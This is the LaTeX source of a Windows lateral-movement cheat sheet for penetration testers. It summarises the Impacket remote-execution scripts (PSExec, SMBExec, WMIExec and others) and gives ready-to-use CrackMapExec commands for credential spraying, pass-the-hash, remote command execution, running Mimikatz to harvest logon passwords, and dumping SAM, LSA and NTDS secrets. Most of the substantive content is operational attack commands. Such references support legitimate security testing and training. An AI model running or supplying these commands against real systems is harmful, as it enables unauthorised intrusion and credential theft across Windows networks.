\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{tz-pl} \pdfinfo{ /Title (windows-lateral-movement.pdf) /Creator (Cheatography) /Author (tz-pl) /Subject (Windows Lateral Movement Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{00A4EF} \definecolor{LightBackground}{HTML}{EFF9FE} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Windows Lateral Movement Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{tz-pl} via \textcolor{DarkBackground}{\uline{cheatography.com/103310/cs/21266/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}tz-pl \\ \uline{cheatography.com/tz-pl} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 29th November, 2019.\\ Page {\thepage} of \pageref{LastPage}. \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{x{1.368 cm} x{4.56 cm} x{1.672 cm} } \SetRowColor{DarkBackground} \mymulticolumn{3}{x{8.4cm}}{\bf\textcolor{white}{Impacket}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{PSExec}} & Writable share required, default ADMIN\$. Interactive shell or single command. Similar to psexec.exe, uses RemComSVC. & SMB - 445 \tn % Row Count 5 (+ 5) % Row 1 \SetRowColor{white} {\bf{SMBExec}} & No writable share required. Requires 4 SMB Connections. Doesn't use RemComSVC. Semi-interactive shell or single command. & SMB - 445 \tn % Row Count 10 (+ 5) % Row 2 \SetRowColor{LightBackground} {\bf{ATExec}} & Writable share required, default ADMIN\$. Run a single command through task scheduler. & SMB - 445 \tn % Row Count 14 (+ 4) % Row 3 \SetRowColor{white} {\bf{WMIEexe}} & Semi-interactive shell through WMI. No service/agent installation require, runs elevate privileges if possible. Stealthy. & RPC, WMI - 135 \tn % Row Count 20 (+ 6) % Row 4 \SetRowColor{LightBackground} {\bf{DCOMExec}} & Semi-interactive shell, similar to WMIexec but using different DCOM endpoints. Blocked by default due to Windows firewall rules. & RCP, DCOM - 135 \tn % Row Count 26 (+ 6) \hhline{>{\arrayrulecolor{DarkBackground}}---} \SetRowColor{LightBackground} \mymulticolumn{3}{x{8.4cm}}{{\bf{Example:}} \newline `python \textless{}script.py\textgreater{} domain/user:password@IP \textless{}command\textgreater{}` \newline \newline PSExec, SMBExec, WMIExec will obtain shells if \textless{}command\textgreater{} is blank} \tn \hhline{>{\arrayrulecolor{DarkBackground}}---} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{CrackMapExec}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Swiss army knife for pentesting with many features. Spray credentials across environment to enumerate shares, sessions, disks, users, login privileges, execute commands, dump SAM and LSA secrets, run mimikatz, and more. \{\{nl\}\}Can perform command execution via Impacket's smbexec, wmiexec, atexec.} \tn % Row Count 6 (+ 6) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Spray domain creds:}} `crackmapexec 192.168.1.0/24 -u user -p 'P@ssw0rd' -d domain.com`} \tn % Row Count 8 (+ 2) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{Spray local creds:}} `crackmapexec 192.168.1.0/24 -u user -p 'P@ssw0rd' -{}-local-user`} \tn % Row Count 10 (+ 2) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Spray creds from files:}} `crackmapexec 192.168.1.0/24 -u users.txt -p passwords.txt`} \tn % Row Count 12 (+ 2) % Row 4 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{Pass-the-hash:}} `crackmapexec 192.168.1.0/24 -u user -H NTLMhash`} \tn % Row Count 14 (+ 2) % Row 5 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Execute command:}} `crackmapexec 192.168.1.0/24 -u user -p 'password' -{}-exec-method smbexec -x whoami`} \tn % Row Count 17 (+ 3) % Row 6 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{{\bf{Run Mimikatz:}} `crackmapexec 192.168.1.0/24 -u user -p 'password' -M \seqsplit{modules/credentials/mimiaktz}.py -o \seqsplit{COMMAND='privilege::debug;sekurlsa::logonpasswords'`}} \tn % Row Count 21 (+ 4) % Row 7 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{{\bf{Common Enumeration Options}}} \tn % Row Count 22 (+ 1) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Enumerate shares: `-{}-shares`} \tn % Row Count 23 (+ 1) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Dump sam, lsa or ntds: `-{}-sam` `-{}-lsa` `-{}-ntds`} \tn % Row Count 24 (+ 1) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{Sessions: `-{}-sessions`} \tn % Row Count 25 (+ 1) % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{8.4cm}}{Logged on users: `-{}-lusers`} \tn % Row Count 26 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}